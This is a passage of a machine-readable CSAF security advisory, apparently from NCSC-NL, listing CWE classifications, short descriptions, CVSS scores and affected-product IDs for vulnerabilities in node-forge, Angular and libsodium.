"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36",
"CSAFPID-37",
"CSAFPID-38",
"CSAFPID-39",
"CSAFPID-40",
"CSAFPID-41",
"CSAFPID-42",
"CSAFPID-43",
"CSAFPID-44",
"CSAFPID-45",
"CSAFPID-46",
"CSAFPID-47",
"CSAFPID-48",
"CSAFPID-49",
"CSAFPID-50",
"CSAFPID-51",
"CSAFPID-52",
"CSAFPID-53",
"CSAFPID-54",
"CSAFPID-55",
"CSAFPID-56",
"CSAFPID-57",
"CSAFPID-58",
"CSAFPID-59",
"CSAFPID-60",
"CSAFPID-61",
"CSAFPID-62",
"CSAFPID-63",
"CSAFPID-64",
"CSAFPID-65",
"CSAFPID-66",
"CSAFPID-67",
"CSAFPID-68",
"CSAFPID-69",
"CSAFPID-70",
"CSAFPID-71",
"CSAFPID-72",
"CSAFPID-73",
"CSAFPID-74",
"CSAFPID-75",
"CSAFPID-76",
"CSAFPID-77",
"CSAFPID-78",
"CSAFPID-79",
"CSAFPID-80",
"CSAFPID-81",
"CSAFPID-82",
"CSAFPID-83",
"CSAFPID-84",
"CSAFPID-85",
"CSAFPID-86",
"CSAFPID-87",
"CSAFPID-88",
"CSAFPID-89",
"CSAFPID-90",
"CSAFPID-91",
"CSAFPID-92",
"CSAFPID-93",
"CSAFPID-94",
"CSAFPID-95",
"CSAFPID-96",
"CSAFPID-97",
"CSAFPID-98",
"CSAFPID-99",
"CSAFPID-100",
"CSAFPID-101",
"CSAFPID-102",
"CSAFPID-103",
"CSAFPID-104",
"CSAFPID-105",
"CSAFPID-106",
"CSAFPID-107",
"CSAFPID-108",
"CSAFPID-109",
"CSAFPID-110",
"CSAFPID-111",
"CSAFPID-112",
"CSAFPID-113",
"CSAFPID-114",
"CSAFPID-115",
"CSAFPID-116",
"CSAFPID-117",
"CSAFPID-118",
"CSAFPID-119",
"CSAFPID-120",
"CSAFPID-121",
"CSAFPID-122",
"CSAFPID-123",
"CSAFPID-124",
"CSAFPID-125",
"CSAFPID-126"
]
}
],
"title": "CVE-2025-66030"
},
{
"cve": "CVE-2025-66031",
"cwe": {
"id": "CWE-674",
"name": "Uncontrolled Recursion"
},
"notes": [
{
"category": "other",
"text": "Uncontrolled Recursion",
"title": "CWE-674"
},
{
"category": "description",
"text": "An Uncontrolled Recursion vulnerability in node-forge versions 1.3.1 and below allows remote attackers to exploit ASN.1 structures, leading to Denial-of-Service via stack exhaustion during TLS connections or certificate parsing.",
"title": "Summary"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36",
"CSAFPID-37",
"CSAFPID-38",
"CSAFPID-39",
"CSAFPID-40",
"CSAFPID-41",
"CSAFPID-42",
"CSAFPID-43",
"CSAFPID-44",
"CSAFPID-45",
"CSAFPID-46",
"CSAFPID-47",
"CSAFPID-48",
"CSAFPID-49",
"CSAFPID-50",
"CSAFPID-51",
"CSAFPID-52",
"CSAFPID-53",
"CSAFPID-54",
"CSAFPID-55",
"CSAFPID-56",
"CSAFPID-57",
"CSAFPID-58",
"CSAFPID-59",
"CSAFPID-60",
"CSAFPID-61",
"CSAFPID-62",
"CSAFPID-63",
"CSAFPID-64",
"CSAFPID-65",
"CSAFPID-66",
"CSAFPID-67",
"CSAFPID-68",
"CSAFPID-69",
"CSAFPID-70",
"CSAFPID-71",
"CSAFPID-72",
"CSAFPID-73",
"CSAFPID-74",
"CSAFPID-75",
"CSAFPID-76",
"CSAFPID-77",
"CSAFPID-78",
"CSAFPID-79",
"CSAFPID-80",
"CSAFPID-81",
"CSAFPID-82",
"CSAFPID-83",
"CSAFPID-84",
"CSAFPID-85",
"CSAFPID-86",
"CSAFPID-87",
"CSAFPID-88",
"CSAFPID-89",
"CSAFPID-90",
"CSAFPID-91",
"CSAFPID-92",
"CSAFPID-93",
"CSAFPID-94",
"CSAFPID-95",
"CSAFPID-96",
"CSAFPID-97",
"CSAFPID-98",
"CSAFPID-99",
"CSAFPID-100",
"CSAFPID-101",
"CSAFPID-102",
"CSAFPID-103",
"CSAFPID-104",
"CSAFPID-105",
"CSAFPID-106",
"CSAFPID-107",
"CSAFPID-108",
"CSAFPID-109",
"CSAFPID-110",
"CSAFPID-111",
"CSAFPID-112",
"CSAFPID-113",
"CSAFPID-114",
"CSAFPID-115",
"CSAFPID-116",
"CSAFPID-117",
"CSAFPID-118",
"CSAFPID-119",
"CSAFPID-120",
"CSAFPID-121",
"CSAFPID-122",
"CSAFPID-123",
"CSAFPID-124",
"CSAFPID-125",
"CSAFPID-126"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-66031 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-66031.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36",
"CSAFPID-37",
"CSAFPID-38",
"CSAFPID-39",
"CSAFPID-40",
"CSAFPID-41",
"CSAFPID-42",
"CSAFPID-43",
"CSAFPID-44",
"CSAFPID-45",
"CSAFPID-46",
"CSAFPID-47",
"CSAFPID-48",
"CSAFPID-49",
"CSAFPID-50",
"CSAFPID-51",
"CSAFPID-52",
"CSAFPID-53",
"CSAFPID-54",
"CSAFPID-55",
"CSAFPID-56",
"CSAFPID-57",
"CSAFPID-58",
"CSAFPID-59",
"CSAFPID-60",
"CSAFPID-61",
"CSAFPID-62",
"CSAFPID-63",
"CSAFPID-64",
"CSAFPID-65",
"CSAFPID-66",
"CSAFPID-67",
"CSAFPID-68",
"CSAFPID-69",
"CSAFPID-70",
"CSAFPID-71",
"CSAFPID-72",
"CSAFPID-73",
"CSAFPID-74",
"CSAFPID-75",
"CSAFPID-76",
"CSAFPID-77",
"CSAFPID-78",
"CSAFPID-79",
"CSAFPID-80",
"CSAFPID-81",
"CSAFPID-82",
"CSAFPID-83",
"CSAFPID-84",
"CSAFPID-85",
"CSAFPID-86",
"CSAFPID-87",
"CSAFPID-88",
"CSAFPID-89",
"CSAFPID-90",
"CSAFPID-91",
"CSAFPID-92",
"CSAFPID-93",
"CSAFPID-94",
"CSAFPID-95",
"CSAFPID-96",
"CSAFPID-97",
"CSAFPID-98",
"CSAFPID-99",
"CSAFPID-100",
"CSAFPID-101",
"CSAFPID-102",
"CSAFPID-103",
"CSAFPID-104",
"CSAFPID-105",
"CSAFPID-106",
"CSAFPID-107",
"CSAFPID-108",
"CSAFPID-109",
"CSAFPID-110",
"CSAFPID-111",
"CSAFPID-112",
"CSAFPID-113",
"CSAFPID-114",
"CSAFPID-115",
"CSAFPID-116",
"CSAFPID-117",
"CSAFPID-118",
"CSAFPID-119",
"CSAFPID-120",
"CSAFPID-121",
"CSAFPID-122",
"CSAFPID-123",
"CSAFPID-124",
"CSAFPID-125",
"CSAFPID-126"
]
}
],
"title": "CVE-2025-66031"
},
{
"cve": "CVE-2025-66035",
"cwe": {
"id": "CWE-201",
"name": "Insertion of Sensitive Information Into Sent Data"
},
"notes": [
{
"category": "other",
"text": "Insertion of Sensitive Information Into Sent Data",
"title": "CWE-201"
},
{
"category": "other",
"text": "Exposure of Private Personal Information to an Unauthorized Actor",
"title": "CWE-359"
},
{
"category": "other",
"text": "CWE-1035",
"title": "CWE-1035"
},
{
"category": "other",
"text": "CWE-937",
"title": "CWE-937"
},
{
"category": "description",
"text": "The document outlines a vulnerability in Angular\u0027s HttpClient that allows unauthorized disclosure of the XSRF token due to improper handling of protocol-relative URLs, affecting versions prior to 19.2.16, 20.3.14, and 21.0.1.",
"title": "Summary"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36",
"CSAFPID-37",
"CSAFPID-38",
"CSAFPID-39",
"CSAFPID-40",
"CSAFPID-41",
"CSAFPID-42",
"CSAFPID-43",
"CSAFPID-44",
"CSAFPID-45",
"CSAFPID-46",
"CSAFPID-47",
"CSAFPID-48",
"CSAFPID-49",
"CSAFPID-50",
"CSAFPID-51",
"CSAFPID-52",
"CSAFPID-53",
"CSAFPID-54",
"CSAFPID-55",
"CSAFPID-56",
"CSAFPID-57",
"CSAFPID-58",
"CSAFPID-59",
"CSAFPID-60",
"CSAFPID-61",
"CSAFPID-62",
"CSAFPID-63",
"CSAFPID-64",
"CSAFPID-65",
"CSAFPID-66",
"CSAFPID-67",
"CSAFPID-68",
"CSAFPID-69",
"CSAFPID-70",
"CSAFPID-71",
"CSAFPID-72",
"CSAFPID-73",
"CSAFPID-74",
"CSAFPID-75",
"CSAFPID-76",
"CSAFPID-77",
"CSAFPID-78",
"CSAFPID-79",
"CSAFPID-80",
"CSAFPID-81",
"CSAFPID-82",
"CSAFPID-83",
"CSAFPID-84",
"CSAFPID-85",
"CSAFPID-86",
"CSAFPID-87",
"CSAFPID-88",
"CSAFPID-89",
"CSAFPID-90",
"CSAFPID-91",
"CSAFPID-92",
"CSAFPID-93",
"CSAFPID-94",
"CSAFPID-95",
"CSAFPID-96",
"CSAFPID-97",
"CSAFPID-98",
"CSAFPID-99",
"CSAFPID-100",
"CSAFPID-101",
"CSAFPID-102",
"CSAFPID-103",
"CSAFPID-104",
"CSAFPID-105",
"CSAFPID-106",
"CSAFPID-107",
"CSAFPID-108",
"CSAFPID-109",
"CSAFPID-110",
"CSAFPID-111",
"CSAFPID-112",
"CSAFPID-113",
"CSAFPID-114",
"CSAFPID-115",
"CSAFPID-116",
"CSAFPID-117",
"CSAFPID-118",
"CSAFPID-119",
"CSAFPID-120",
"CSAFPID-121",
"CSAFPID-122",
"CSAFPID-123",
"CSAFPID-124",
"CSAFPID-125",
"CSAFPID-126"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-66035 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-66035.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.6,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36",
"CSAFPID-37",
"CSAFPID-38",
"CSAFPID-39",
"CSAFPID-40",
"CSAFPID-41",
"CSAFPID-42",
"CSAFPID-43",
"CSAFPID-44",
"CSAFPID-45",
"CSAFPID-46",
"CSAFPID-47",
"CSAFPID-48",
"CSAFPID-49",
"CSAFPID-50",
"CSAFPID-51",
"CSAFPID-52",
"CSAFPID-53",
"CSAFPID-54",
"CSAFPID-55",
"CSAFPID-56",
"CSAFPID-57",
"CSAFPID-58",
"CSAFPID-59",
"CSAFPID-60",
"CSAFPID-61",
"CSAFPID-62",
"CSAFPID-63",
"CSAFPID-64",
"CSAFPID-65",
"CSAFPID-66",
"CSAFPID-67",
"CSAFPID-68",
"CSAFPID-69",
"CSAFPID-70",
"CSAFPID-71",
"CSAFPID-72",
"CSAFPID-73",
"CSAFPID-74",
"CSAFPID-75",
"CSAFPID-76",
"CSAFPID-77",
"CSAFPID-78",
"CSAFPID-79",
"CSAFPID-80",
"CSAFPID-81",
"CSAFPID-82",
"CSAFPID-83",
"CSAFPID-84",
"CSAFPID-85",
"CSAFPID-86",
"CSAFPID-87",
"CSAFPID-88",
"CSAFPID-89",
"CSAFPID-90",
"CSAFPID-91",
"CSAFPID-92",
"CSAFPID-93",
"CSAFPID-94",
"CSAFPID-95",
"CSAFPID-96",
"CSAFPID-97",
"CSAFPID-98",
"CSAFPID-99",
"CSAFPID-100",
"CSAFPID-101",
"CSAFPID-102",
"CSAFPID-103",
"CSAFPID-104",
"CSAFPID-105",
"CSAFPID-106",
"CSAFPID-107",
"CSAFPID-108",
"CSAFPID-109",
"CSAFPID-110",
"CSAFPID-111",
"CSAFPID-112",
"CSAFPID-113",
"CSAFPID-114",
"CSAFPID-115",
"CSAFPID-116",
"CSAFPID-117",
"CSAFPID-118",
"CSAFPID-119",
"CSAFPID-120",
"CSAFPID-121",
"CSAFPID-122",
"CSAFPID-123",
"CSAFPID-124",
"CSAFPID-125",
"CSAFPID-126"
]
}
],
"title": "CVE-2025-66035"
},
{
"cve": "CVE-2025-66412",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"notes": [
{
"category": "other",
"text": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
"title": "CWE-79"
},
{
"category": "other",
"text": "CWE-1035",
"title": "CWE-1035"
},
{
"category": "other",
"text": "CWE-937",
"title": "CWE-937"
},
{
"category": "description",
"text": "A Stored Cross-Site Scripting vulnerability in Angular Template Compiler prior to versions 21.0.2, 20.3.15, and 19.2.17 allows attackers to inject malicious scripts via improperly validated URL attributes and SVG elements.",
"title": "Summary"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36",
"CSAFPID-37",
"CSAFPID-38",
"CSAFPID-39",
"CSAFPID-40",
"CSAFPID-41",
"CSAFPID-42",
"CSAFPID-43",
"CSAFPID-44",
"CSAFPID-45",
"CSAFPID-46",
"CSAFPID-47",
"CSAFPID-48",
"CSAFPID-49",
"CSAFPID-50",
"CSAFPID-51",
"CSAFPID-52",
"CSAFPID-53",
"CSAFPID-54",
"CSAFPID-55",
"CSAFPID-56",
"CSAFPID-57",
"CSAFPID-58",
"CSAFPID-59",
"CSAFPID-60",
"CSAFPID-61",
"CSAFPID-62",
"CSAFPID-63",
"CSAFPID-64",
"CSAFPID-65",
"CSAFPID-66",
"CSAFPID-67",
"CSAFPID-68",
"CSAFPID-69",
"CSAFPID-70",
"CSAFPID-71",
"CSAFPID-72",
"CSAFPID-73",
"CSAFPID-74",
"CSAFPID-75",
"CSAFPID-76",
"CSAFPID-77",
"CSAFPID-78",
"CSAFPID-79",
"CSAFPID-80",
"CSAFPID-81",
"CSAFPID-82",
"CSAFPID-83",
"CSAFPID-84",
"CSAFPID-85",
"CSAFPID-86",
"CSAFPID-87",
"CSAFPID-88",
"CSAFPID-89",
"CSAFPID-90",
"CSAFPID-91",
"CSAFPID-92",
"CSAFPID-93",
"CSAFPID-94",
"CSAFPID-95",
"CSAFPID-96",
"CSAFPID-97",
"CSAFPID-98",
"CSAFPID-99",
"CSAFPID-100",
"CSAFPID-101",
"CSAFPID-102",
"CSAFPID-103",
"CSAFPID-104",
"CSAFPID-105",
"CSAFPID-106",
"CSAFPID-107",
"CSAFPID-108",
"CSAFPID-109",
"CSAFPID-110",
"CSAFPID-111",
"CSAFPID-112",
"CSAFPID-113",
"CSAFPID-114",
"CSAFPID-115",
"CSAFPID-116",
"CSAFPID-117",
"CSAFPID-118",
"CSAFPID-119",
"CSAFPID-120",
"CSAFPID-121",
"CSAFPID-122",
"CSAFPID-123",
"CSAFPID-124",
"CSAFPID-125",
"CSAFPID-126"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-66412 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-66412.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.1,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36",
"CSAFPID-37",
"CSAFPID-38",
"CSAFPID-39",
"CSAFPID-40",
"CSAFPID-41",
"CSAFPID-42",
"CSAFPID-43",
"CSAFPID-44",
"CSAFPID-45",
"CSAFPID-46",
"CSAFPID-47",
"CSAFPID-48",
"CSAFPID-49",
"CSAFPID-50",
"CSAFPID-51",
"CSAFPID-52",
"CSAFPID-53",
"CSAFPID-54",
"CSAFPID-55",
"CSAFPID-56",
"CSAFPID-57",
"CSAFPID-58",
"CSAFPID-59",
"CSAFPID-60",
"CSAFPID-61",
"CSAFPID-62",
"CSAFPID-63",
"CSAFPID-64",
"CSAFPID-65",
"CSAFPID-66",
"CSAFPID-67",
"CSAFPID-68",
"CSAFPID-69",
"CSAFPID-70",
"CSAFPID-71",
"CSAFPID-72",
"CSAFPID-73",
"CSAFPID-74",
"CSAFPID-75",
"CSAFPID-76",
"CSAFPID-77",
"CSAFPID-78",
"CSAFPID-79",
"CSAFPID-80",
"CSAFPID-81",
"CSAFPID-82",
"CSAFPID-83",
"CSAFPID-84",
"CSAFPID-85",
"CSAFPID-86",
"CSAFPID-87",
"CSAFPID-88",
"CSAFPID-89",
"CSAFPID-90",
"CSAFPID-91",
"CSAFPID-92",
"CSAFPID-93",
"CSAFPID-94",
"CSAFPID-95",
"CSAFPID-96",
"CSAFPID-97",
"CSAFPID-98",
"CSAFPID-99",
"CSAFPID-100",
"CSAFPID-101",
"CSAFPID-102",
"CSAFPID-103",
"CSAFPID-104",
"CSAFPID-105",
"CSAFPID-106",
"CSAFPID-107",
"CSAFPID-108",
"CSAFPID-109",
"CSAFPID-110",
"CSAFPID-111",
"CSAFPID-112",
"CSAFPID-113",
"CSAFPID-114",
"CSAFPID-115",
"CSAFPID-116",
"CSAFPID-117",
"CSAFPID-118",
"CSAFPID-119",
"CSAFPID-120",
"CSAFPID-121",
"CSAFPID-122",
"CSAFPID-123",
"CSAFPID-124",
"CSAFPID-125",
"CSAFPID-126"
]
}
],
"title": "CVE-2025-66412"
},
{
"cve": "CVE-2025-69277",
"cwe": {
"id": "CWE-184",
"name": "Incomplete List of Disallowed Inputs"
},
"notes": [
{
"category": "other",
"text": "Incomplete List of Disallowed Inputs",
"title": "CWE-184"
},
{
"category": "other",
"text": "CWE-1035",
"title": "CWE-1035"
},
{
"category": "other",
"text": "CWE-937",
"title": "CWE-937"
},
{
"category": "description",
"text": "Libsodium versions prior to ad3004e contain vulnerabilities in the crypto_core_ed25519_is_valid_point function that cause improper validation of elliptic curve points, potentially allowing security bypasses in custom cryptographic scenarios.",
"title": "Summary"
},
{
"category": "general",
"text": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36",
"CSAFPID-37",
"CSAFPID-38",
"CSAFPID-39",
"CSAFPID-40",
"CSAFPID-41",
"CSAFPID-42",
"CSAFPID-43",
"CSAFPID-44",
"CSAFPID-45",
"CSAFPID-46",
"CSAFPID-47",
"CSAFPID-48",
"CSAFPID-49",
"CSAFPID-50",
"CSAFPID-51",
"CSAFPID-52",
"CSAFPID-53",
"CSAFPID-54",
"CSAFPID-55",
"CSAFPID-56",
"CSAFPID-57",
"CSAFPID-58",
"CSAFPID-59",
"CSAFPID-60",
"CSAFPID-61",
"CSAFPID-62",
"CSAFPID-63",
"CSAFPID-64",
"CSAFPID-65",
"CSAFPID-66",
"CSAFPID-67",
"CSAFPID-68",
"CSAFPID-69",
"CSAFPID-70",
"CSAFPID-71",
"CSAFPID-72",
"CSAFPID-73",
"CSAFPID-74",
"CSAFPID-75",
"CSAFPID-76",
"CSAFPID-77",
"CSAFPID-78",
"CSAFPID-79",
"CSAFPID-80",
"CSAFPID-81",
"CSAFPID-82",
"CSAFPID-83",
"CSAFPID-84",
"CSAFPID-85",
"CSAFPID-86",
"CSAFPID-87",
"CSAFPID-88",
"CSAFPID-89",
"CSAFPID-90",
"CSAFPID-91",
"CSAFPID-92",
"CSAFPID-93",
"CSAFPID-94",
"CSAFPID-95",
"CSAFPID-96",
"CSAFPID-97",
"CSAFPID-98",
"CSAFPID-99",
"CSAFPID-100",
"CSAFPID-101",
"CSAFPID-102",
"CSAFPID-103",
"CSAFPID-104",
"CSAFPID-105",
"CSAFPID-106",
"CSAFPID-107",
"CSAFPID-108",
"CSAFPID-109",
"CSAFPID-110",
"CSAFPID-111",
"CSAFPID-112",
"CSAFPID-113",
"CSAFPID-114",
"CSAFPID-115",
"CSAFPID-116",
"CSAFPID-117",
"CSAFPID-118",
"CSAFPID-119",
"CSAFPID-120",
"CSAFPID-121",
"CSAFPID-122",
"CSAFPID-123",
"CSAFPID-124",
"CSAFPID-125",
"CSAFPID-126"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-69277 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-69277.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36",
"CSAFPID-37",
"CSAFPID-38",
"CSAFPID-39",
"CSAFPID-40",
"CSAFPID-41",
"CSAFPID-42",
"CSAFPID-43",
"CSAFPID-44",
"CSAFPID-45",
"CSAFPID-46",
"CSAFPID-47",
"CSAFPID-48",
"CSAFPID-49",
"CSAFPID-50",
"CSAFPID-51",
"CSAFPID-52",
"CSAFPID-53",
"CSAFPID-54",
"CSAFPID-55",
"CSAFPID-56",
"CSAFPID-57",
"CSAFPID-58",
"CSAFPID-59",
"CSAFPID-60",
"CSAFPID-61",
"CSAFPID-62",
"CSAFPID-63",
"CSAFPID-64",
"CSAFPID-65",
"CSAFPID-66",
"CSAFPID-67",
"CSAFPID-68",
"CSAFPID-69",
"CSAFPID-70",
"CSAFPID-71",
"CSAFPID-72",
"CSAFPID-73",
"CSAFPID-74",
"CSAFPID-75",
"CSAFPID-76",
"CSAFPID-77",
"CSAFPID-78",
"CSAFPID-79",
"CSAFPID-80",
"CSAFPID-81",
"CSAFPID-82",
"CSAFPID-83",
"CSAFPID-84",
"CSAFPID-85",
"CSAFPID-86",
"CSAFPID-87",
"CSAFPID-88",
"CSAFPID-89",
"CSAFPID-90",
"CSAFPID-91",
"CSAFPID-92",
"CSAFPID-93",
"CSAFPID-94",
"CSAFPID-95",
"CSAFPID-96",
"CSAFPID-97",
"CSAFPID-98",
"CSAFPID-99",
"CSAFPID-100",
"CSAFPID-101",
"CSAFPID-102",
"CSAFPID-103",
"CSAFPID-104",
"CSAFPID-105",
"CSAFPID-106",
"CSAFPID-107",
"CSAFPID-108",
"CSAFPID-109",
"CSAFPID-110",
"CSAFPID-111",
"CSAFPID-112",
"CSAFPID-113",
"CSAFPID-114",
"CSAFPID-115",
"CSAFPID-116",
"CSAFPID-117",
"CSAFPID-118",
"CSAFPID-119",
"CSAFPID-120",
"CSAFPID-121",
"CSAFPID-122",
"CSAFPID-123",
"CSAFPID-124",
